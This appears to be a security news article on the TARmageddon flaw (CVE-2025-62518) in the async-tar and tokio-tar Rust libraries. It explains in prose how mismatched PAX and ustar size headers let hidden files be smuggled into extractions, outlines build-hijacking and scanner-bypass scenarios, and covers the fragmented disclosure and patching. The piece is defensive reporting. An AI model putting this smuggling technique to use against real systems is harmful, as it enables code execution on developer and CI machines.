The Edera security team has discovered a critical vulnerability in the async-tar Rust library and its descendants, including the widely-used tokio-tar.
Dubbed TARmageddon and assigned CVE-2025-62518, this flaw carries a CVSS score of 8.1 (High) and enables attackers to execute remote code by overwriting configuration files and hijacking critical build systems.
| Field | Details |
| CVE ID | CVE-2025-62518 |
| Vulnerability Name | TARmageddon |
| Affected Libraries | async-tar, tokio-tar, astral-tokio-tar |
| CVSS 3.1 Score | 8.1 |
| Severity | High |
Understanding the Attack Vector
The vulnerability stems from a boundary-parsing bug that allows attackers to insert hidden files into TAR archive extractions through a technique called file smuggling.
When the parser encounters nested TAR files with mismatched PAX (Portable Archive eXchange) and ustar headers, it fails to properly calculate file boundaries.
Specifically, if the PAX header declares a file size of 1 MB while the ustar header claims 0 bytes, the parser incorrectly skips only 0 bytes instead of jumping past the entire file content.
This desynchronization causes the parser to misinterpret data from hidden inner archives as legitimate entries belonging to the outer archive, effectively allowing attackers to slip malicious files past security controls and into extraction directories.
This flaw impacts major projects including uv (Astral’s Python package manager), testcontainers, wasmCloud, and numerous other dependencies.
The exact scope of affected systems remains unknown due to tokio-tar’s widespread distribution across the ecosystem.
The Abandonware Problem
What makes TARmageddon particularly concerning is that the most popular fork, tokio-tar with over 5 million downloads on crates.io, appears to be abandoned and no longer actively maintained.
Unlike typical vulnerability disclosures where a single upstream patch cascades to all downstream users, the Edera team faced a fragmented fork landscape with no clear maintenance structure.
The team was forced to conduct a decentralized disclosure process, coordinating patches across async-tar (the root), tokio-tar (the popular but unmaintained fork), krata-tokio-tar (archived), and astral-tokio-tar (actively maintained by Astral).
Without security contact information, researchers had to locate maintainers through social engineering and community research, then coordinate simultaneous patching under a strict 60-day embargo period.
Attackers could exploit TARmageddon in several dangerous ways. A Python build backend hijacking attack could involve uploading a malicious package to PyPI with a hidden inner TAR containing compromised build configuration, leading to RCE during package installation on developer machines and CI systems.
Similarly, container testing frameworks could be tricked into processing poisoned image layers, introducing unexpected files into test environments.
The vulnerability also enables security control bypasses where separate scanning and extraction phases allow attackers to slip unapproved files past approval systems.
Active forks including astral-tokio-tar have been successfully patched, and the Edera team has published patches for affected versions.
However, tokio-tar remains unpatched due to abandonment. Users should immediately upgrade to patched versions or migrate to actively maintained alternatives like astral-tokio-tar.
The Edera fork krata-tokio-tar will be archived to consolidate efforts and reduce ecosystem confusion.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
